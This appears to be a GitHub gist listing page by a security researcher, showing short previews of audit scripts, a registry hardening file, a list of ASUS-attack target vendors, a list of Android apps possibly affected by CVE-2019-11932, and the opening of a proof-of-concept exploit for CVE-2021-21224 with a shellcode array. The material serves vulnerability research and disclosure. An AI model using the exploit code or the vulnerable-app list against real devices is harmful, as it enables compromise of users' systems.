wdormann wdormann
wdormann
/ gist:e15fbc671a0741b72264eca168a252e3
Created
March 29, 2019 12:24
Vendor MACs targeted by ASUS attack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| AMPAK Technology, Inc. | |
| ASUSTek COMPUTER INC. | |
| AzureWave Technology Inc. | |
| BizLink (Kunshan) Co.,Ltd | |
| Chicony Electronics Co., Ltd. | |
| Digital Data Communications Asia Co.,Ltd | |
| GOOD WAY IND. CO., LTD. | |
| HUAWEI TECHNOLOGIES CO.,LTD | |
| Hon Hai Precision Ind. Co.,Ltd. | |
| Intel Corporate |
wdormann
/ packet-tpkt.c.diff
Created
June 21, 2019 15:17
Patch Wireshark 3.0.2 to hook TPKT dissector into TLS decryption
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --- packet-tpkt.c.orig 2019-06-21 14:47:47.831026881 +0000 | |
| +++ packet-tpkt.c 2019-06-21 15:05:31.115056289 +0000 | |
| @@ -22,6 +22,7 @@ | |
| #include <epan/show_exception.h> | |
| #include "packet-tpkt.h" | |
| +#include "packet-tls.h" | |
| void proto_register_tpkt(void); | |
| void proto_reg_handoff_tpkt(void); | |
| @@ -42,6 +43,7 @@ | |
| static gboolean tpkt_desegment = TRUE; |
wdormann
/ disable_discimage.reg
Last active
July 28, 2023 01:45
Disable Windows Explorer file associations for Disc Image Mount (ISO, IMG, VHD, VHDX)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Windows Registry Editor Version 5.00 | |
| [-HKEY_CLASSES_ROOT\.iso] | |
| [-HKEY_CLASSES_ROOT\Windows.IsoFile\shell\mount\command] | |
| [-HKEY_CLASSES_ROOT\.img] | |
| [-HKEY_CLASSES_ROOT\.vhdx] |
wdormann
/ gist:874198c1bd29c7dd2157d9fc1d858263
Last active
June 21, 2020 07:04
List of Android apps that include libpl_droidsonroids_gif.so - potentially vulnerable to CVE-2019-11932. Sorted by install count.
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| com.whatsapp 1000000000 | |
| com.lenovo.anyshare.gps 1000000000 | |
| com.instagram.android 1000000000 | |
| com.zhiliaoapp.musically 500000000 | |
| com.viber.voip 500000000 | |
| wp.wattpad 100000000 | |
| vStudio.Android.Camera360 100000000 | |
| vsin.t16_funny_photo 100000000 | |
| com.yahoo.mobile.client.android.mail 100000000 | |
| com.xvideostudio.videoeditor 100000000 |
wdormann
/ checkaslr.py
Last active
April 20, 2020 18:16
Check for running processes on Windows that have components that do not utilize ASLR
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| ''' | |
| Utility to check for processes running with non-ASLR-compatible components. | |
| Run with Administrative privileges to get visibility into all processes. | |
| (1a) psutil: https://pypi.org/project/psutil/ | |
| Installed via PIP | |
| -OR- | |
| (1b) Sysinternals ListDLLs: https://docs.microsoft.com/en-us/sysinternals/downloads/listdlls |
wdormann
/ privileged.py
Last active
April 30, 2021 13:07
List privileged services that don't come with Windows 10 - deprecated
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # DON'T USE THIS VERSION! | |
| # Try https://gist.github.com/wdormann/89ed779933fe205fb52ecf3eacf5ff40 instead | |
| import os | |
| import subprocess | |
| # See: https://blogs.msmvps.com/erikr/2007/09/26/set-permissions-on-a-specific-service-windows/ | |
| svcinfo = {} | |
| FNULL = open(os.devnull, 'w') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Don't use this version! | |
| # Try https://gist.github.com/wdormann/8afe4edf605627ee4f203861b6cc3a1c instead | |
| # | |
| # Utility for listing SYSTEM-privileged scheduled tasks on Windows | |
| # Tasks that come with Windows 10 are not included. | |
| # Admin privileges are required to list all scheduled tasks. | |
| import csv | |
| import subprocess | |
| import tempfile |
wdormann
/ privileged.ps1
Last active
February 21, 2023 22:06
List privileged services that don't come with Windows 10 VMware guest
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $win10_builtin = @('AppVClient', 'ClickToRunSvc', 'COMSysApp', 'diagnosticshub.standardcollector.service', | |
| 'msiserver', 'ose', 'perceptionsimulation', 'SecurityHealthService', 'Sense', | |
| 'SensorDataService', 'SgrmBroker', 'Spooler', 'ssh-agent', 'TieringEngineService', | |
| 'TrustedInstaller', 'UevAgentService', 'vds', 'VSS', 'wbengine', 'WinDefend', 'wmiApSrv', | |
| 'WSearch', 'XboxNetApiSvc', 'XboxGipSvc', 'XblGameSave', 'XblAuthManager', 'WwanSvc', 'wuauserv', | |
| 'WwanSvc', 'wuauserv', 'WpnService', 'WPDBusEnum', 'WpcMonSvc', 'WManSvc', 'wlidsvc', 'WlanSvc', | |
| 'wisvc', 'Winmgmt', 'WiaRpc', 'WerSvc', 'wercplsupport', 'WdiSystemHost', 'WbioSrvc', 'WalletService', | |
| 'WaaSMedicSvc', 'vmvss', 'vmicvss', 'vmicvmsession', 'vmicshutdown', 'vmicrdv', 'vmickvpexchange', | |
| 'vmicheartbeat', 'vmicguestinterface', 'VaultSvc', 'UsoSvc', 'UserManager', 'UmRdpService', | |
| 'TroubleshootingSvc', 'TrkWks', 'TokenBroker', 'Themes', 'TabletInputService', |
wdormann
/ privtasks.ps1
Last active
August 15, 2023 15:15
List privileged scheduled tasks that don't come with Windows
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent()) | |
| if (-Not $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { | |
| Write-Warning "We don't have elevated privileges. The following results may not be complete." | |
| } | |
| schtasks /query /fo csv -v | ConvertFrom-Csv | ? {$_.Status -notlike "Disabled" -and $_.TaskName -notlike "\Microsoft\Windows\*" -and $_.TaskName -notlike "\Microsoft\Office\*" -and $_.TaskName -notlike "\Microsoft\XblGameSave\*" -and $_.TaskName -notlike "TaskName" -and ($_."Run As User" -like "*system" -or $_."Run As User" -like "Administrator*")} | fl taskname,"Comment","Task To Run","Run As User" |
wdormann
/ CVE-2021-21224.html
Last active
October 31, 2022 22:01
Sample ARM64 PoC for CVE-2021-21224
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| function gc() { | |
| for (var i = 0; i < 0x80000; ++i) { | |
| var a = new ArrayBuffer(); | |
| } | |
| } | |
| let shellcode = [ | |
| // Move x18 to x28 (TEB) |